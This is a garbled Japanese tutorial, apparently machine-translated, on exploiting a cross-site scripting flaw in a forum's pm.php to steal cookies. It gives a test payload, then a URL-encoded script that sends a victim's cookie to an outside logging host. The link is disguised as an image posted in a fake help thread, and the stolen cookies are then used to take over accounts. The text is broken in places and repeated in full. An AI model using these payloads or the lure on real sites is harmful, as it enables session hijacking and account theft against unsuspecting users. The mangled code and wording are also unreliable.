クロススクリプト攻撃+Cookies詐欺(Discz編)
今回はDisczをみんなに見せます。まず私達は知っています。Disczはpm.phpのプログラムの中にあります。
会員の名前は濾過して、私達がいくつかのscriptを書き込むことができることを招きます。
賢い学生達、思いつきましたか?私たちはこのバグを利用してクッキーのscriptを書くことができます。
これは色が見えるようにします。 反応するよ!(自らを取る 数学塾 =")
私たちはまず本端から 自分のcookiesを取ってみてください。
例:
http://www.abc.com/pm.php?action=send&username=何を見ますかscript>alert(documents.co okie)
OKですか 続いて 私たちは他の人のcookiesを得るために だからプラットホームをまたぐ方式を採用して、
まず相手に見てもらいました。私たちが心を込めて作ったURLです。つながったら私たちが作ったphpに来ます。 or asp プログラムの中
相手の自分のcookiesを書き込みます。 私たちのプログラムには…が必要です。 googleで探してください 大陸犬 あそこは…
ですから、相手のcookiesを取得した後、自分がこのフォーラムにいるcookiesの記録を探します。
見つけたら cookiesの中の情報を相手のユーザー名に変えたり、暗号化されたmd 5コードを…
md 5サイズは逆にしてはいけません。
今は原理を言ってから、実戦を始めましょう。 早く来てください
今はもうpm.phpのbugを知っています。 私達もすでにphpプログラムをアップロードしました。
続いて フォーラムに行ってlinkを送ります。 P.S. いくつかのフォーラム まだ利用できます 顔写真 騙しに来ました
全部個人の考えを見ます。 =")
パソコンの問題を問う文章を貼りました。写真を添付しました。
偽のウェブサイトがあると仮定して、http://myweb.hinet.net/uarestupid/home1/XXX.jpg
勝手に書いてください 写真のように見えたら 連結だけでいいです
あわせて持つhttp://myweb.hinet.net/uarestupid/home1/XXX.jpg我々の抜け穴の連結を加えて、
だからこのように見えます。
http://myweb.hinet.net/uarestupid/home1/XXX.jpg
以上の写真はlinkで見たところ、皆さんは本当に写真だと思います。
実は繋がっています
http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open(%68%74%70%3 A%2 F%2 F%6 D%65%6 D%62%65%72%73%2 E%6 C%79%63%6 F%2 E%63%2 F%63%6 F%2 F%75%6 B%2 F%6 A%65%6 D%65%6 D%79%63%77%2 F%68%62%E%68%2 Bdocuments.co okie、%3 C/script%3 E%3 Cb%22
以上、urlコードを作りました。勉強している学生はcookiesで検索してみましょう。
だからね 彼は写真を押して連結してから…自分のcookiesを送りました。 = =" でも、彼は写真を見ることができます。
会員の名前は濾過して、私達がいくつかのscriptを書き込むことができることを招きます。
賢い学生達、思いつきましたか?私たちはこのバグを利用してクッキーのscriptを書くことができます。
これは色が見えるようにします。 反応するよ!(自らを取る 数学塾 =")
私たちはまず本端から 自分のcookiesを取ってみてください。
例:
http://www.abc.com/pm.php?action=send&username=何を見ますかscript>alert(documents.co okie)
OKですか 続いて 私たちは他の人のcookiesを得るために だからプラットホームをまたぐ方式を採用して、
まず相手に見てもらいました。私たちが心を込めて作ったURLです。つながったら私たちが作ったphpに来ます。 or asp プログラムの中
相手の自分のcookiesを書き込みます。 私たちのプログラムには…が必要です。 googleで探してください 大陸犬 あそこは…
ですから、相手のcookiesを取得した後、自分がこのフォーラムにいるcookiesの記録を探します。
見つけたら cookiesの中の情報を相手のユーザー名に変えたり、暗号化されたmd 5コードを…
md 5サイズは逆にしてはいけません。
今は原理を言ってから、実戦を始めましょう。 早く来てください
今はもうpm.phpのbugを知っています。 私達もすでにphpプログラムをアップロードしました。
続いて フォーラムに行ってlinkを送ります。 P.S. いくつかのフォーラム まだ利用できます 顔写真 騙しに来ました
全部個人の考えを見ます。 =")
パソコンの問題を問う文章を貼りました。写真を添付しました。
偽のウェブサイトがあると仮定して、http://myweb.hinet.net/uarestupid/home1/XXX.jpg
勝手に書いてください 写真のように見えたら 連結だけでいいです
あわせて持つhttp://myweb.hinet.net/uarestupid/home1/XXX.jpg我々の抜け穴の連結を加えて、
だからこのように見えます。
http://myweb.hinet.net/uarestupid/home1/XXX.jpg
以上の写真はlinkで見たところ、皆さんは本当に写真だと思います。
実は繋がっています
http://www.abc.com/pm.php?action=send&username=fuck%22%3E%3Cscript%3Ewindow.open(%68%74%70%3 A%2 F%2 F%6 D%65%6 D%62%65%72%73%2 E%6 C%79%63%6 F%2 E%63%2 F%63%6 F%2 F%75%6 B%2 F%6 A%65%6 D%65%6 D%79%63%77%2 F%68%62%E%68%2 Bdocuments.co okie、%3 C/script%3 E%3 Cb%22
以上、urlコードを作りました。勉強している学生はcookiesで検索してみましょう。
だからね 彼は写真を押して連結してから…自分のcookiesを送りました。 = =" でも、彼は写真を見ることができます。